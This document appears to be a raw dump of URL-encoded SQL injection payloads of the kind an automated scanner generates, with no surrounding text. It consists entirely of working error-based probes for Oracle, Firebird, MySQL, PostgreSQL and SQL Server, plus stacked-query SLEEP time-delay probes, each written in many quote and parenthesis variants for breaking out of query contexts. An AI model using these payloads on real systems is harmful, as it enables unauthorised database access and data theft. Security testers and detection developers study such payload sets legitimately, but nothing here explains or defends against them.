-5271%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -6154%27%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -4963%27%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -6072%22%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -7782%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%281642%3D1642 -7542%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%283019%3D3019 -6045%29%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%281639%3D1639 -7733%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -7919%27%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27fwUU%27%3D%27fwUU -9263%27%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27metd%27%3D%27metd -2705%27%29%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27yuQU%27%3D%27yuQU -6819%27%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%27WRdF%27%3D%27WRdF -8137%27%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27jXWC%27%20LIKE%20%27jXWC -8340%27%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27bDuc%27%20LIKE%20%27bDuc -9809%27%29%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27juSC%27%20LIKE%20%27juSC -7312%27%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%27gIMo%27%20LIKE%20%27gIMo -3678%22%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22HEDc%22%3D%22HEDc -1567%22%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22UOvX%22%3D%22UOvX -5537%22%29%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22aizl%22%3D%22aizl -3738%22%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%22YxpK%22%3D%22YxpK -3781%22%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22NCYu%22%20LIKE%20%22NCYu -2439%22%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22KKQk%22%20LIKE%20%22KKQk -9763%22%29%29%29%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22VQHm%22%20LIKE%20%22VQHm -7106%22%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29%20AND%20%22tTFu%22%20LIKE%20%22tTFu -8727%29%20WHERE%209847%3D9847%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -4315%27%29%20WHERE%207726%3D7726%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -8454%27%20WHERE%202034%3D2034%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -8071%22%20WHERE%201071%3D1071%20OR%205807%3DCTXSYS.DRITHSX.SN%285807%2C%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285807%3D5807%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29%29 -7279%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 -4779%27%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 -7081%27%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 -4885%22%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 -8122%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%282232%3D2232 -3960%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%285785%3D5785 -3683%29%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%286272%3D6272 -9497%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 -6445%27%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%27vyol%27%3D%27vyol -1631%27%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%27YBsB%27%3D%27YBsB -3221%27%29%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%28%27sTSw%27%3D%27sTSw -4060%27%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%27ugKz%27%3D%27ugKz -5572%27%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%27BLBq%27%20LIKE%20%27BLBq -9622%27%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%27nikg%27%20LIKE%20%27nikg -7576%27%29%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%28%27PkBU%27%20LIKE%20%27PkBU -4479%27%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%27OtSb%27%20LIKE%20%27OtSb -8270%22%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%22KSYc%22%3D%22KSYc -2864%22%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%22hyJI%22%3D%22hyJI -1111%22%29%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%28%22UCES%22%3D%22UCES -3076%22%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%22TKll%22%3D%22TKll -6889%22%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%22qoTY%22%20LIKE%20%22qoTY -9083%22%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%22yGBu%22%20LIKE%20%22yGBu -2181%22%29%29%29%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%28%28%28%22KWhN%22%20LIKE%20%22KWhN -4712%22%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%20AND%20%22ULYd%22%20LIKE%20%22ULYd -9824%29%20WHERE%201386%3D1386%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 -2695%27%29%20WHERE%204934%3D4934%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 -3284%27%20WHERE%207467%3D7467%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 -8071%22%20WHERE%208783%3D8783%20OR%206917%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%206917%20WHEN%206917%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29 %28SELECT%205074%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%285074%3D5074%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 %28EXTRACTVALUE%282385%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%282385%3D2385%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29%29 %28UPDATEXML%283242%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283242%3D3242%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C9423%29%29 %28CAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287874%3D7874%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%29 %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282746%3D2746%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%29 %28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283276%3D3276%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%201487%3D%28%27%3Agbx%3A%27%7C%7C%28SELECT%20CASE%201487%20WHEN%201487%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Aenb%3A%27%29%29 1234.5%2C%28SELECT%203071%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%283071%3D3071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1234.5%2CEXTRACTVALUE%285715%2CCONCAT%280x5c%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%285715%3D5715%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%29 1234.5%2CUPDATEXML%289426%2CCONCAT%280x2e%2C0x3a6762783a%2C%28SELECT%20%28CASE%20WHEN%20%289426%3D9426%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656e623a%29%2C3291%29 1234.5%2C%28CAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288847%3D8847%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%29 1234.5%2C%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283752%3D3752%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%29 1234.5%2C%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283433%3D3433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%29%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%27%29%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%27%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%22%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%286938%3D6938 1234.5%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%286045%3D6045 1234.5%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%285136%3D5136 1234.5%3B%20SELECT%20SLEEP%285%29%3B%23 1234.5%27%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%27pyka%27%3D%27pyka 1234.5%27%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%27aVEC%27%3D%27aVEC 1234.5%27%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%27VIIv%27%3D%27VIIv 1234.5%27%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%27vHqf%27%3D%27vHqf 1234.5%27%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%27cHoN%27%20LIKE%20%27cHoN 1234.5%27%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%27WBAn%27%20LIKE%20%27WBAn 1234.5%27%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%27SoqA%27%20LIKE%20%27SoqA 1234.5%27%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%27DHhE%27%20LIKE%20%27DHhE 1234.5%22%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%22WOyG%22%3D%22WOyG 1234.5%22%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%22JUzC%22%3D%22JUzC 1234.5%22%29%29%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%28%28%22YwEg%22%3D%22YwEg 1234.5%22%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%22cJyn%22%3D%22cJyn 1234.5%22%29%3B%20SELECT%20SLEEP%285%29%3B%23%20AND%20%28%22pehx%22%20LIKE%20%22pehx 